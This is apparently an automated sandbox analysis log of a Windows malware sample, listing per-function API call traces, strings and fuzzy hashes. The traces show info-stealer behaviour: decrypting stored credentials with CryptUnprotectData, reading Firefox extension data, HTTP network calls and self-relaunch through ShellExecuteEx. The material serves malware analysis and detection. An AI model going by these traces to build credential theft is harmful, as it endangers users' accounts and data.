lstrcat.KERNEL32(?,00431D48), ref: 0245132F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02451366
lstrlen.KERNEL32(006389F0), ref: 02451374
lstrcpy.KERNEL32(00000000,?), ref: 02451398
lstrcat.KERNEL32(00000000,006389F0), ref: 024513A0
lstrlen.KERNEL32(00431D50), ref: 024513AB
lstrcpy.KERNEL32(00000000,00000000), ref: 024513CF
lstrcat.KERNEL32(00000000,00431D50), ref: 024513DB
lstrcpy.KERNEL32(00000000,00000000), ref: 02451401
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02451446
lstrlen.KERNEL32(00638CA4), ref: 02451455
lstrcpy.KERNEL32(00000000,?), ref: 0245147C
lstrcat.KERNEL32(00000000,?), ref: 02451484
lstrcpy.KERNEL32(00000000,00000000), ref: 024514BF
lstrcat.KERNEL32(00000000), ref: 024514CC
lstrcpy.KERNEL32(00000000,00000000), ref: 024514F3
CopyFileA.KERNEL32(?,?,00000001), ref: 0245151C
lstrcpy.KERNEL32(00000000,?), ref: 02451548
lstrcpy.KERNEL32(00000000,?), ref: 02451584

Part of subcall function 0246F197: lstrcpy.KERNEL32(00000000,?), ref: 0246F1C9

DeleteFileA.KERNEL32(?), ref: 024515B8
memset.MSVCRT ref: 024515D5

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction ID: 2df0de32f61ac5d96b021a29a00227ecc6928d8859db19ba8df4af9ed716a3a9
Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
Instruction Fuzzy Hash: 59A16771A00669ABDB11EF75CC88F9E7BBAAF44304F04442AFC49A7252DB74D901DFA0

Function 0246AE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 0246AE96
lstrlen.KERNEL32(00638DD4), ref: 0246AEAC
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AED4
lstrcat.KERNEL32(00000000,00000000), ref: 0246AEDF
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AF08
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AF4B
lstrcat.KERNEL32(00000000,00000000), ref: 0246AF55
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AF7E
lstrlen.KERNEL32(0043509C), ref: 0246AF98
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AFBA
lstrcat.KERNEL32(00000000,0043509C), ref: 0246AFC6
lstrcpy.KERNEL32(00000000,00000000), ref: 0246AFEF
lstrlen.KERNEL32(0043509C), ref: 0246B001
lstrcpy.KERNEL32(00000000,00000000), ref: 0246B023
lstrcat.KERNEL32(00000000,0043509C), ref: 0246B02F
lstrcpy.KERNEL32(00000000,00000000), ref: 0246B058
lstrlen.KERNEL32(00638DB8), ref: 0246B06E
lstrcpy.KERNEL32(00000000,00000000), ref: 0246B096
lstrcat.KERNEL32(00000000,00000000), ref: 0246B0A1
lstrcpy.KERNEL32(00000000,00000000), ref: 0246B0CA
lstrcpy.KERNEL32(00000000,?), ref: 0246B106
lstrcat.KERNEL32(00000000,00000000), ref: 0246B110
lstrcpy.KERNEL32(00000000,00000000), ref: 0246B136
lstrlen.KERNEL32(00000000), ref: 0246B14C
lstrcpy.KERNEL32(00000000,00638A98), ref: 0246B17F

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction ID: 8cd20d2f0febc99c440491fa747103836b1d2b9d228f864406561b6658e5f263
Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
Instruction Fuzzy Hash: E3B12B71901A2A9BDB21EF65CC88ABF77B7AF40309F04052BEC55A7251DBB4D900DF92

Function 02471A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471A96
lstrlen.KERNEL32(00638DEC), ref: 02471AA7
lstrcpy.KERNEL32(00000000,00000000), ref: 02471ACE
lstrcat.KERNEL32(00000000,00000000), ref: 02471AD9
lstrcpy.KERNEL32(00000000,00000000), ref: 02471B08
lstrlen.KERNEL32(00435564), ref: 02471B1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02471B3B
lstrcat.KERNEL32(00000000,00435564), ref: 02471B47
lstrcpy.KERNEL32(00000000,00000000), ref: 02471B76
lstrlen.KERNEL32(00638B1C), ref: 02471B8C
lstrcpy.KERNEL32(00000000,00000000), ref: 02471BB3
lstrcat.KERNEL32(00000000,00000000), ref: 02471BBE
lstrcpy.KERNEL32(00000000,00000000), ref: 02471BED
lstrlen.KERNEL32(00435564), ref: 02471BFF
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C20
lstrcat.KERNEL32(00000000,00435564), ref: 02471C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C5B
lstrlen.KERNEL32(00638D70), ref: 02471C71
lstrcpy.KERNEL32(00000000,00000000), ref: 02471C98
lstrcat.KERNEL32(00000000,00000000), ref: 02471CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 02471CD2
lstrlen.KERNEL32(00638D6C), ref: 02471CE8
lstrcpy.KERNEL32(00000000,00000000), ref: 02471D0F
lstrcat.KERNEL32(00000000,00000000), ref: 02471D1A
lstrcpy.KERNEL32(00000000,00000000), ref: 02471D49

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction ID: d261975710036e596894e79f1efdd7d0d6e58ebd1ae3af737cd258b6444426fd
Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
Instruction Fuzzy Hash: 93911DB06007479FD720DFB9CC88A5BB7EAAF04349B14582AAC99D3751DBB4E840DF60

Function 02464D77 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02464DAA
LocalAlloc.KERNEL32(00000040,?), ref: 02464DDC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02464E29
lstrlen.KERNEL32(00435128), ref: 02464E34
lstrcpy.KERNEL32(00000000,00000000), ref: 02464E51
lstrcat.KERNEL32(00000000,00435128), ref: 02464E5D
lstrcpy.KERNEL32(00000000,00000000), ref: 02464E82
lstrcpy.KERNEL32(00000000,00000000), ref: 02464EAF
lstrcat.KERNEL32(00000000,00000000), ref: 02464EBA
lstrcpy.KERNEL32(00000000,00000000), ref: 02464EE1
StrStrA.SHLWAPI(?,00000000), ref: 02464EF3
lstrlen.KERNEL32(?), ref: 02464F07
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02464F48
lstrcpy.KERNEL32(00000000,?), ref: 02464FCF
lstrcpy.KERNEL32(00000000,?), ref: 02464FF8
lstrcpy.KERNEL32(00000000,?), ref: 02465021
lstrcpy.KERNEL32(00000000,?), ref: 02465047
lstrcpy.KERNEL32(00000000,?), ref: 02465074

Strings

moz-extension+++, xrefs: 02464F4E
^userContextId=4294967295, xrefs: 02464F6B

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$AllocLocal
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 4107348322-3310892237
Opcode ID: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
Instruction ID: e07e30a9e33640edd84b89b76319d9eeeb55b2cb6f547112aef39eb01de396e8
Opcode Fuzzy Hash: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
Instruction Fuzzy Hash: 54B18171A0066A9BCB21EF75DC88AAF7BE6AF44308F04452AEC45A7711DB74EC01CF91

Function 02456DE7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 229networkstringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 02456E16
lstrcpy.KERNEL32(00000000,0042D01C), ref: 02456E69
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02456E7C
StrCmpCA.SHLWAPI(?,00638C80), ref: 02456E94
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02456EBC
HttpOpenRequestA.WININET(00000000,00435080,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 02456EF7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02456F1E
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02456F2D
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02456F4C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02456FA6
lstrcpy.KERNEL32(00000000,?), ref: 02457002
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 02457024
InternetCloseHandle.WININET(00000000), ref: 02457035
InternetCloseHandle.WININET(?), ref: 0245703F
InternetCloseHandle.WININET(00000000), ref: 02457049
lstrcpy.KERNEL32(00000000,00000000), ref: 0245706A

Strings

ERROR, xrefs: 02456F59

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR
API String ID: 3687753495-2861137601
Opcode ID: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
Instruction ID: 2383ad5c3dde4f6460b76964376269af2728c39e9f083d5c075d5ab8a782aaad
Opcode Fuzzy Hash: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
Instruction Fuzzy Hash: 9A818171A01225ABEB20DF65CC44FAEB7BAAF44704F14406AFD45E7281DB74E9058FA4

Function 0246C0E7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C11A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246C14D
lstrlen.KERNEL32(004353D4), ref: 0246C158
lstrcpy.KERNEL32(00000000,?), ref: 0246C178
lstrcat.KERNEL32(00000000,004353D4), ref: 0246C184
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C1A7
lstrcat.KERNEL32(00000000,00000000), ref: 0246C1B2
lstrlen.KERNEL32(0043540C), ref: 0246C1BD
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C1DA
lstrcat.KERNEL32(00000000,0043540C), ref: 0246C1E6
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C20D
lstrlen.KERNEL32(00435410), ref: 0246C22D
lstrcpy.KERNEL32(00000000,?), ref: 0246C24F
lstrcat.KERNEL32(00000000,00435410), ref: 0246C25B
lstrcpy.KERNEL32(00000000,00000000), ref: 0246C281
ShellExecuteEx.SHELL32(?), ref: 0246C2D3

Strings

<, xrefs: 0246C2B4

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
String ID: <
API String ID: 4016326548-4251816714
Opcode ID: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
Instruction ID: ccbbfcdbca18cf7c594480953e48887f59763949240add1222c370773ba4dc3a
Opcode Fuzzy Hash: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
Instruction Fuzzy Hash: 6261A570E006699BCB11EFB5CC8C6AF7BA6AF04708F04442BEC85E7212DB74C9019F91

Function 0245B660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0245B687
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B6D5
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B700
lstrcat.KERNEL32(00000000,00000000), ref: 0245B708
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B730
lstrlen.KERNEL32(00435214), ref: 0245B7A7
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B7CB
lstrcat.KERNEL32(00000000,00435214), ref: 0245B7D7
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B800
lstrlen.KERNEL32(00000000), ref: 0245B884
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B8AE
lstrcat.KERNEL32(00000000,00000000), ref: 0245B8B6
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B8DE
lstrlen.KERNEL32(0043509C), ref: 0245B955
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B979
lstrcat.KERNEL32(00000000,0043509C), ref: 0245B985
lstrcpy.KERNEL32(00000000,00000000), ref: 0245B9B5
lstrlen.KERNEL32(?), ref: 0245BABE
lstrlen.KERNEL32(?), ref: 0245BACD
lstrcpy.KERNEL32(00000000,00000000), ref: 0245BAF5

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction ID: 7ef9b1d58c5e76cea08881dcd83d7560fb0c1670d3e2f660e987aa774557984b
Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction Fuzzy Hash: 0B022070A016258FDB25DF65C948A6AB7F2EF4430CF18806EEC899B366D775D842CF90

Function 0246DD07 Relevance: 24.3, APIs: 16, Instructions: 292stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0246DD62
lstrcpy.KERNEL32(00000000,?), ref: 0246DD95
lstrcat.KERNEL32(?,00000000), ref: 0246DDA3
lstrcat.KERNEL32(?,00638B0C), ref: 0246DDBD
lstrcat.KERNEL32(?,?), ref: 0246DDD1
lstrcat.KERNEL32(?,00638DD8), ref: 0246DDE5
lstrcpy.KERNEL32(00000000,?), ref: 0246DE15
GetFileAttributesA.KERNEL32(00000000), ref: 0246DE1C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0246DE85

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
Instruction ID: ee565c225d70d5c356a08ccd5ef4e0cad3b0f59ddea6ff2ecdda7337df00c8b8
Opcode Fuzzy Hash: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
Instruction Fuzzy Hash: E8B1A3B1E00269DFDB14EFB4CC889FE77B6AF48304F04486AE945A7251DB349A45CFA1

Function 02473967 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 222registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02477477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02477495

RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 024739C4
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 024739FE
wsprintfA.USER32 ref: 02473A29
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02473A47
RegCloseKey.ADVAPI32(?), ref: 02473A55
RegCloseKey.ADVAPI32(?), ref: 02473A5F
RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 02473AA8
lstrlen.KERNEL32(?), ref: 02473ABD
RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 02473B2E
RegCloseKey.ADVAPI32(?), ref: 02473B79
RegCloseKey.ADVAPI32(?), ref: 02473B90

Strings

- , xrefs: 02473B38
?, xrefs: 024739A5

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
String ID: - $?
API String ID: 13140697-712516993
Opcode ID: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
Instruction ID: 6337aa104fb964dba0901fd0dbbde88a37271ee993fb8cde83284370cef86711
Opcode Fuzzy Hash: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
Instruction Fuzzy Hash: 90915EB2D002189FCB10DFA4DC849EEBBBAFB88314F1585AEE519AB211D7319D45DF90

Function 024718A7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 024718E8
lstrcpy.KERNEL32(00000000,00638C44), ref: 02471913
lstrlen.KERNEL32(?,?,?,?), ref: 02471920
lstrcpy.KERNEL32(00000000,00000000), ref: 0247193D
lstrcat.KERNEL32(00000000,?), ref: 0247194B
lstrcpy.KERNEL32(00000000,00000000), ref: 02471971
lstrlen.KERNEL32(00638AA8,?,?,?), ref: 02471986
lstrcpy.KERNEL32(00000000,?), ref: 024719A9
lstrcat.KERNEL32(00000000,00638AA8), ref: 024719B1
lstrcpy.KERNEL32(00000000,00000000), ref: 024719D9
ShellExecuteEx.SHELL32(?), ref: 02471A14
ExitProcess.KERNEL32 ref: 02471A4A

Strings

<, xrefs: 024719F5

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
String ID: <
API String ID: 3579039295-4251816714
Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction ID: 7de29f6ec800964cc738554a89d41cd8bba73009355c8ed94351189a07d4531b
Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction Fuzzy Hash: 4F5143B1901669AFDB11DF75CC84ADEBBFAAF44304F00512AE919E3351DB749A05CF90

Function 0246F367 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0246F39B
lstrcpy.KERNEL32(00000000,?), ref: 0246F3C9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0246F3DD
lstrlen.KERNEL32(00000000), ref: 0246F3EC
LocalAlloc.KERNEL32(00000040,00000001), ref: 0246F40A
StrStrA.SHLWAPI(00000000,?), ref: 0246F438
lstrlen.KERNEL32(?), ref: 0246F44B
strtok.MSVCRT(00000001,?), ref: 0246F45D
lstrlen.KERNEL32(00000000), ref: 0246F469
lstrcpy.KERNEL32(00000000,ERROR), ref: 0246F4B6
lstrcpy.KERNEL32(00000000,ERROR), ref: 0246F4F6

Strings

ERROR, xrefs: 0246F3D7, 0246F476, 0246F4B0, 0246F4F0

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction ID: 98fc7d53dd74959b58a58bd81f769b5718acbc00b7518abb61d58c88745e8b48
Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction Fuzzy Hash: 2351BE719006655FCB21EF39DC48EBE7BA6AF80308F05451BEC8A9BB12DB74D805CB91

Function 0245A2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0245A2ED
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0245A31A
lstrlen.KERNEL32(00639BD8), ref: 0245A327
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0245A351
lstrlen.KERNEL32(00435210), ref: 0245A35C
lstrcpy.KERNEL32(00000000,00000000), ref: 0245A379
lstrcat.KERNEL32(00000000,00435210), ref: 0245A385
lstrcpy.KERNEL32(00000000,00000000), ref: 0245A3AB
lstrcat.KERNEL32(00000000,00000000), ref: 0245A3B6
lstrcpy.KERNEL32(00000000,00000000), ref: 0245A3DB
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0245A3F6
LoadLibraryA.KERNEL32(00638D78), ref: 0245A40A

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction ID: 32a6e80818f94f9f6eae367542895958bcf3e39655004680e0df5abf562d3f22
Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction Fuzzy Hash: 4F91BE70600A349FD7209BA5DC88EA737A7EB49709B40466BFC8587363EBB5D941CBD0

Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(009080C0,00639BD8,0000FFFF), ref: 0040A086
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
lstrlenA.KERNEL32(00435210), ref: 0040A0F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
SetEnvironmentVariableA.KERNEL32(009080C0,00000000), ref: 0040A18F
LoadLibraryA.KERNEL32(0090EFC0), ref: 0040A1A3

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6

Function 02457977 Relevance: 18.2, APIs: 12, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024579AC
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024579F1
strlen.MSVCRT ref: 02457A25
StrStrA.SHLWAPI(?,0043508C), ref: 02457A5F
strlen.MSVCRT ref: 02457AF4

Part of subcall function 024578F7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 02457905
Part of subcall function 024578F7: RtlAllocateHeap.NTDLL(00000000), ref: 0245790C
Part of subcall function 024578F7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02457934
Part of subcall function 024578F7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02457954
Part of subcall function 024578F7: LocalFree.KERNEL32(?), ref: 0245795E

strcpy_s.MSVCRT ref: 02457A88
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02457A93
HeapFree.KERNEL32(00000000), ref: 02457A9A
strlen.MSVCRT ref: 02457AA7
strcpy_s.MSVCRT ref: 02457AD1
strlen.MSVCRT ref: 02457B1B
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 02457BDC

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
String ID:
API String ID: 225686516-0
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: f6a58c023ff206a787b17d097e4929cf446d8caaf053cb1e59705df1e61a8177
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: 0B812DB1D002199FCB10DF95DC84ADEFBB9EF48304F1041AAE949A7211EB759A85CFA1

Function 0246EAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0246EB35
lstrcpy.KERNEL32(00000000,?), ref: 0246EB67
lstrcat.KERNEL32(?,00000000), ref: 0246EB73
lstrcat.KERNEL32(?,004354E4), ref: 0246EB8A
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0246EBF3
